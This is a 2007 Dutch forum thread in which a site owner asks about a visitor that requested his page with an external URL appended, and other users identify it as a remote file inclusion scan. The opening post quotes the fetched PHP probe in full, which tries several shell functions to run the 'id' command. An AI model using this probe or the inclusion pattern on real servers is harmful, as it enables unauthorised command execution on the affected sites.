Vreemde Bezoeker op mijn website.. - Privacy en beveiliging

vrijdag 6 juli 2007 16:27

Acties:

Systeem Beheerder

Topicstarter

Ik was net ff mijn bezoekers aan het monitoren, zie ik daar een bezoeker wat het volgende adres aan het bekijken was:

http://domein.com/index.p...www.thiaguinho.net/id.txt?

Voor het geval id.txt niet meer beschikbaar is, hier is wat er in staat:

code:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Ik weet aardig wat van PHP af, maar dit is perl en ik snap er echt niks van, dus als dit iets gevaarlijks is verwijder het maar, ik zeg al.. ik weet niet wat het is, daar wil ik juist achter komen.

De agent die hij gebruikte is: libwww-perl/5.79

Ik heb het IP ook nog, maar kweet niet of ik dat hier zomaar mag posten.

Iemand enig idee wat die gast probeerde te doen?

Ik geloof niet dat het een vriendelijke bezoeker was/is...

Naatan.com - Blog & Wordpress Plugins | Divia-CMS.com (OpenSource) - Currently Recruiting!

vrijdag 6 juli 2007 16:31

Acties:

Naatan

Systeem Beheerder

Topicstarter

Update:

hij is nu zo'n 10x op mijn site, met allemaal verschillende IP's..

Naatan.com - Blog & Wordpress Plugins | Divia-CMS.com (OpenSource) - Currently Recruiting!

vrijdag 6 juli 2007 16:31

Acties:

LED-Maniak

sja, blijkbaar een spammer?

Die berichtjes wil plaatsen.

Werkende url: http://www.naatan.com/ind...www.thiaguinho.net/id.txt

[ Voor 49% gewijzigd door LED-Maniak op 06-07-2007 16:32 ]

Mitsubishi externe temperatuur sensor (Home Assistant compatible): V&A - ClimaControl - Ook voor Panasonic & LG.

vrijdag 6 juli 2007 16:32

Acties:

Verwijderd

kan je die niet gewoon blokken dan,als je het niet vertrouwd

vrijdag 6 juli 2007 16:33

Acties:

Naatan

Systeem Beheerder

Topicstarter

Update:

elk IP heeft een andere agent, zijn er nu zo'n 20.. denk dattek mn webserver ff offline ga zetten.

Naatan.com - Blog & Wordpress Plugins | Divia-CMS.com (OpenSource) - Currently Recruiting!

vrijdag 6 juli 2007 16:35

Acties:

Soultaker

Het script is gewoon PHP (geen Perl) en probeert of 'ie op de een of andere manier shell commando's uitvoert. Aan de URL te zien zit er een fout in Divia CMS waardoor je remote code can uitvoeren (waarschijnlijk door fopen-wrappers, waarmee je een remote URL in plaats van een lokaal bestand als argument kunt meegeven).

Als je geen Divia CMS draait, dan is het waarschijnlijk een random poging van een script kiddy om een exploit toe te passen. Niets om je zorgen over te maken; daar staan mijn webserver logs ook vol mee. Draai je het wel, dan moet je eens uitzoeken of je vulnerable bent of niet.

edit:
Dat je trouwens verschillende IP's/user agents ziet kan komen doordat je die URL hier gepost hebt. Ik heb er zelf al een keer op drie op geklikt heb, maar ik probeer echt je webserver niet te hacken hoor.

[ Voor 17% gewijzigd door Soultaker op 06-07-2007 16:37 ]

vrijdag 6 juli 2007 16:35

Acties:

Verwijderd

volgens mij is het wel php en probeert het scriptje uit of de php-functies "system" "exec" "shell_exec" "passthru" op de php-installatie mogen worden uitgevoerd, om aansluitend een rootkit te installeren.

vrijdag 6 juli 2007 16:36

Acties:

Nijn

Dit script poogt shell commando's uit te voeren. Tenzij de software die je er zelf opgezet hebt iets met shell commando's doet zou ik dit als de donder er vanaf halen.

/edit: Te laat

[ Voor 16% gewijzigd door Nijn op 06-07-2007 16:36 ]

vrijdag 6 juli 2007 16:41

Acties:

Naatan

Systeem Beheerder

Topicstarter

Ik zal eens kijken..

Een spammer is het niet, hij probeert de programmatuur uit te voeren die er in de URL staat (www.thiaguinho.net/id.txt).

Wsl is dit een exploit in een of ander CMS, en aangezien die pagina het woordje CMS in de titel heeft stuurt ie zijn hondjes er op af..

Naatan.com - Blog & Wordpress Plugins | Divia-CMS.com (OpenSource) - Currently Recruiting!

vrijdag 6 juli 2007 16:41

Acties:

F_J_K

Moderator CSA/PB

Front verplichte underscores

Nijn schreef op vrijdag 06 juli 2007 @ 16:36:
Dit script poogt shell commando's uit te voeren. Tenzij de software die je er zelf opgezet hebt iets met shell commando's doet zou ik dit als de donder er vanaf halen.

.. zou ik als de donder zorgen dat willekeurige mensen helemaal geen bestanden meer kunnen uploaden

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

vrijdag 6 juli 2007 16:41

Acties:

LED-Maniak

Je scriptje lijkt me trouwens ook niet de veiligste.

Open de url maar eens in notepad. Dan krijg je de exacte php code.

Mitsubishi externe temperatuur sensor (Home Assistant compatible): V&A - ClimaControl - Ook voor Panasonic & LG.

vrijdag 6 juli 2007 16:42

Acties:

Naatan

Systeem Beheerder

Topicstarter

Nijn schreef op vrijdag 06 juli 2007 @ 16:36:
Dit script poogt shell commando's uit te voeren. Tenzij de software die je er zelf opgezet hebt iets met shell commando's doet zou ik dit als de donder er vanaf halen.

/edit: Te laat

Geen nood, ik heb uit voorzorg de webserver offline gehaalt. Ik start hem nu weer..

Het is absoluut geen exploit op Divia CMS aangezien Divia CMS door mij ontwikkelt word en het nog niet released is, kan dus onmogelijk daaraan liggen.

Enfin, de uitleg over al de IP's makes sence..

Naatan.com - Blog & Wordpress Plugins | Divia-CMS.com (OpenSource) - Currently Recruiting!

vrijdag 6 juli 2007 16:45

Acties:

Naatan

Systeem Beheerder

Topicstarter

LED-Maniak schreef op vrijdag 06 juli 2007 @ 16:41:
Je scriptje lijkt me trouwens ook niet de veiligste.

Open de url maar eens in notepad. Dan krijg je de exacte php code.

ehh "mijn" scriptje?

denk dat je nog eens de post moet lezen

En je kunt het ook gewoon in je browser openen.

Reden dat je het kunt lezen is omdat de exploit waar ze naar op zoek zijn het ook moet kunnen lezen.

Denk dat het gewoon een scanner was.. goed ik heb zn IP, ik report het bij mijn host en hij ziet maar wat ie er mee doet..

Naatan.com - Blog & Wordpress Plugins | Divia-CMS.com (OpenSource) - Currently Recruiting!

vrijdag 6 juli 2007 16:51

Acties:

Naatan

Systeem Beheerder

Topicstarter

Help! Ik word overbelast door tweakertjes

URL even aangepast, de ware boosdoener lijkt gevlucht..

Naatan.com - Blog & Wordpress Plugins | Divia-CMS.com (OpenSource) - Currently Recruiting!

Pagina: 1

Reageer